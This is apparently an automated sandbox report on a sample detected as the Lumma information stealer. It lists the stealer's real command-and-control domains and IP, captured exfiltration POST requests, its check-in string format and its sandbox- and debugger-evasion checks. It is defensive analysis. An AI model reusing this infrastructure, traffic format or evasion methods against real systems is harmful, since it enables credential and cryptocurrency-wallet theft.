
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1560426
MD5: 6380b8ca2f9bfc1d86617a3a7fd924f1
SHA1: 04ff7e660a59bd2c45098e99a3fd5bff614d2d57
SHA256: f7b7694decac18c856b37c68c8486eccd09470ec28c7f92d90f5f0905110eb7c
Tags: exe user-Bitsight

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6408 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6380B8CA2F9BFC1D86617A3A7FD924F1)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["p10tgrace.sbs", "processhol.sbs", "3xp3cts1aim.sbs", "p3ar11fter.sbs", "peepburry828.sbs"], "Build id": "LOGS11--LiveTraffic"}
Source: decrypted.memstr | Rule: JoeSecurity_LummaCStealer_2 | Description: Yara detected LummaC Stealer | Author: Joe Security | Strings: (none listed)
    No Sigma rule has matched
    Timestamp                        SID      Severity  Classtype                             Source IP    Source Port  Destination IP  Destination Port  Protocol
    2024-11-21T19:57:01.063780+0100  2028371  3         Unknown Traffic                       192.168.2.4  49730        104.21.66.38    443               TCP
    2024-11-21T19:57:03.173261+0100  2028371  3         Unknown Traffic                       192.168.2.4  49731        104.21.66.38    443               TCP
    2024-11-21T19:57:01.802442+0100  2054653  1         A Network Trojan was detected         192.168.2.4  49730        104.21.66.38    443               TCP
    2024-11-21T19:57:01.802442+0100  2049836  1         A Network Trojan was detected         192.168.2.4  49730        104.21.66.38    443               TCP
    2024-11-21T19:57:01.063780+0100  2057731  1         Domain Observed Used for C2 Detected  192.168.2.4  49730        104.21.66.38    443               TCP
    2024-11-21T19:57:03.173261+0100  2057731  1         Domain Observed Used for C2 Detected  192.168.2.4  49731        104.21.66.38    443               TCP
    2024-11-21T19:56:59.191822+0100  2057730  1         Domain Observed Used for C2 Detected  192.168.2.4  54395        1.1.1.1         53                UDP


    AV Detection

    Source: file.exe | Avira: detected
    Source: https://cook-rain.sbs/apiOn | Avira URL Cloud: Label: malware
    Source: https://cook-rain.sbs:443/api- | Avira URL Cloud: Label: malware
    Source: https://cook-rain.sbs/Q | Avira URL Cloud: Label: malware
    Source: https://cook-rain.sbs/api% | Avira URL Cloud: Label: malware
    Source: file.exe.6408.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["p10tgrace.sbs", "processhol.sbs", "3xp3cts1aim.sbs", "p3ar11fter.sbs", "peepburry828.sbs"], "Build id": "LOGS11--LiveTraffic"}
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
    Source: file.exe | Joe Sandbox ML: detected
    Source: 00000000.00000003.1690148012.0000000005110000.00000004.00001000.00020000.00000000.sdmp | String decryptor: p3ar11fter.sbs
    Source: 00000000.00000003.1690148012.0000000005110000.00000004.00001000.00020000.00000000.sdmp | String decryptor: 3xp3cts1aim.sbs
    Source: 00000000.00000003.1690148012.0000000005110000.00000004.00001000.00020000.00000000.sdmp | String decryptor: peepburry828.sbs
    Source: 00000000.00000003.1690148012.0000000005110000.00000004.00001000.00020000.00000000.sdmp | String decryptor: p10tgrace.sbs
    Source: 00000000.00000003.1690148012.0000000005110000.00000004.00001000.00020000.00000000.sdmp | String decryptor: processhol.sbs
    Source: 00000000.00000003.1690148012.0000000005110000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000000.00000003.1690148012.0000000005110000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
    Source: 00000000.00000003.1690148012.0000000005110000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
    Source: 00000000.00000003.1690148012.0000000005110000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
    Source: 00000000.00000003.1690148012.0000000005110000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
    Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknown | HTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [eax], bl | 0_2_0095CF05
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then push eax | 0_2_0098F8D0
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edi, eax | 0_2_0098F8D0
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx eax, byte ptr [esp+esi+000001E8h] | 0_2_0095E0D8
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+14h] | 0_2_009598F0
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edx, eax | 0_2_0098B8E0
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edx, ecx | 0_2_0098B8E0
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov ecx, eax | 0_2_0095C02B
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh | 0_2_0098C040
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], C18BC4BAh | 0_2_0098C040
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 6DBC3610h | 0_2_0098C040
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh | 0_2_0098C040
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [ebx], al | 0_2_00970870
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then push eax | 0_2_0098B860
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edi, byte ptr [esp+edx+14h] | 0_2_0095E970
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov word ptr [esi], cx | 0_2_0095EA38
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-65h] | 0_2_0095E35B
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov eax, ebp | 0_2_00955C90
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov eax, ebp | 0_2_00955C90
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edx, ecx | 0_2_0095BC9D
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_00978CB0
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4C697C35h | 0_2_0098BCE0
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx] | 0_2_0095AD00
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [edi] | 0_2_00975E90
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx+00008F12h] | 0_2_009577D0
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov word ptr [ebp+ebx*4+00h], ax | 0_2_009577D0
    Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-58FA0F6Ch] | 0_2_00990F60

    Networking

    Source: Network traffic | Suricata IDS: 2057730 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs) : 192.168.2.4:54395 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49730 -> 104.21.66.38:443
    Source: Network traffic | Suricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49731 -> 104.21.66.38:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.66.38:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.66.38:443
    Source: Malware configuration extractor | URLs: p10tgrace.sbs
    Source: Malware configuration extractor | URLs: processhol.sbs
    Source: Malware configuration extractor | URLs: 3xp3cts1aim.sbs
    Source: Malware configuration extractor | URLs: p3ar11fter.sbs
    Source: Malware configuration extractor | URLs: peepburry828.sbs
    Source: Joe Sandbox View | IP Address: 104.21.66.38
    Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.66.38:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.66.38:443
    Source: global traffic | HTTP traffic detected:
        POST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 8
        Host: cook-rain.sbs
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic | DNS traffic detected: DNS query: cook-rain.sbs
    Source: unknown | HTTP traffic detected:
        POST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 8
        Host: cook-rain.sbs
    Source: file.exe, 00000000.00000003.1732682281.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.000000000127A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
    Source: file.exe, 00000000.00000002.1734316733.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732682281.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.000000000127A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cook-rain.sbs/
    Source: file.exe, 00000000.00000002.1734316733.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732682281.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.000000000127A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cook-rain.sbs/Q
    Source: file.exe, 00000000.00000003.1732013708.000000000127A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cook-rain.sbs/api
    Source: file.exe, 00000000.00000002.1734132839.000000000129B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.000000000127A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cook-rain.sbs/api%
    Source: file.exe, 00000000.00000003.1732682281.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733073508.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1734316733.00000000012D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cook-rain.sbs/apiOn
    Source: file.exe, 00000000.00000002.1734132839.0000000001262000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.0000000001262000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cook-rain.sbs:443/api-
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknown | HTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.4:49730 version: TLS 1.2

    System Summary

    Source: file.exe | Static PE information: section name:
    Source: file.exe | Static PE information: section name: .idata
    Source: file.exe | Static PE information: section name:
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00989030
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009589A0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0095CF05
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0098F8D0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0095E0D8
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009598F0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0098B8E0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AAD864
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00956840
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0098C040
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00970870
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009561A0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009841D0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B141FF
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0095E970
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B192F9
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00954AC0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1E2E7
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00955AC9
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00959210
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0095B210
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A03A35
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ABEA6D
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00952B80
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4E3B8
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B9B3D4
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B22338
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0096DB30
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0096FB60
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00955C90
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AA74BA
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00990C80
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00978CB0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009594D0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00956CC0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009824E0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A02C38
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0095542C
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B15C78
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00953580
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00991580
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A58D26
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ACC52A
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0095AD00
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00969530
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00973D70
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C156C
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00975E90
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A0F6B0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F0E1A
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00977E20
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00970650
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00971790
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0098C780
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009887B0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009DEFA3
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009527D0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009577D0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AA4FF6
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00978770
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00990F60
    Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: file.exe | Static PE information: Section: ZLIB complexity 0.9994748975409836
    Source: file.exe | Static PE information: Section: nbqdyuoa ZLIB complexity 0.9944721758275129
    Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@1/1
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009827B0 CoCreateInstance
    Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
    Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
    Source: file.exe | Static file information: File size 1858048 > 1048576
    Source: file.exe | Static PE information: Raw size of nbqdyuoa is bigger than: 0x100000 < 0x19ba00

    Data Obfuscation

    Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.950000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nbqdyuoa:EW;lsjapkzb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nbqdyuoa:EW;lsjapkzb:EW;.taggant:EW;
    Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
    Source: file.exe | Static PE information: real checksum: 0x1cf735 should be: 0x1c5dcc
    Source: file.exe | Static PE information: section name:
    Source: file.exe | Static PE information: section name: .idata
    Source: file.exe | Static PE information: section name:
    Source: file.exe | Static PE information: section name: nbqdyuoa
    Source: file.exe | Static PE information: section name: lsjapkzb
    Source: file.exe | Static PE information: section name: .taggant
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C118C3 push esi; mov dword ptr [esp], edx | 0_2_00C119C3
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BCB892 push edi; mov dword ptr [esp], ebp | 0_2_00BCB94C
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BCB892 push eax; mov dword ptr [esp], 77FD103Fh | 0_2_00BCB96E
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5A085 push esi; mov dword ptr [esp], edi | 0_2_00B5A13A
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB1887 push ecx; mov dword ptr [esp], ebp | 0_2_00BB18A1
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push ecx; mov dword ptr [esp], 65FF1FC5h | 0_2_00B1C840
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push 4C1C3400h; mov dword ptr [esp], esi | 0_2_00B1C8F5
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push 36387E8Eh; mov dword ptr [esp], eax | 0_2_00B1C98C
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push 7CCC3197h; mov dword ptr [esp], ebp | 0_2_00B1C994
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push ebp; mov dword ptr [esp], 055F44DDh | 0_2_00B1C9BE
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push 1D3A7904h; mov dword ptr [esp], eax | 0_2_00B1C9E8
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push ecx; mov dword ptr [esp], edx | 0_2_00B1CA08
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push ebp; mov dword ptr [esp], edi | 0_2_00B1CA1E
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push edi; mov dword ptr [esp], esi | 0_2_00B1CA4E
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push 13B6DDE1h; mov dword ptr [esp], ebx | 0_2_00B1CA5D
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push 6F4FAB4Fh; mov dword ptr [esp], ebx | 0_2_00B1CB0B
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push ebx; mov dword ptr [esp], 3EE1B8B1h | 0_2_00B1CB89
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push esi; mov dword ptr [esp], ecx | 0_2_00B1CC09
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push 424BCB50h; mov dword ptr [esp], esi | 0_2_00B1CC33
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push esi; mov dword ptr [esp], 66FBA557h | 0_2_00B1CC45
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push 1ECA81C6h; mov dword ptr [esp], edx | 0_2_00B1CCAA
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push 4659B167h; mov dword ptr [esp], esp | 0_2_00B1CDA1
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push 2BBDC888h; mov dword ptr [esp], ecx | 0_2_00B1CDD0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push 62218F1Eh; mov dword ptr [esp], esi | 0_2_00B1CE06
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push 58A5DDAFh; mov dword ptr [esp], ebp | 0_2_00B1CE89
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push esi; mov dword ptr [esp], edx | 0_2_00B1CEA8
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push 33EF5F69h; mov dword ptr [esp], eax | 0_2_00B1CF35
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push 3BFB41FAh; mov dword ptr [esp], eax | 0_2_00B1CF67
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push ebp; mov dword ptr [esp], edx | 0_2_00B1CFCA
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push 25CC1BA4h; mov dword ptr [esp], ebx | 0_2_00B1D01D
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1C836 push ebx; mov dword ptr [esp], esp | 0_2_00B1D024
    Source: file.exe | Static PE information: section name: entropy: 7.987246249896705
    Source: file.exe | Static PE information: section name: nbqdyuoa entropy: 7.954937787050603

    Boot Survival

    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
    Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
    Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9AC962 second address: 9AC971 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB4CD14683Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B213FC second address: B2140D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B2140D second address: B2141E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD14683Ch 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B284D1 second address: B284DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB4CD3D7AA6h 0x0000000a rdtsc
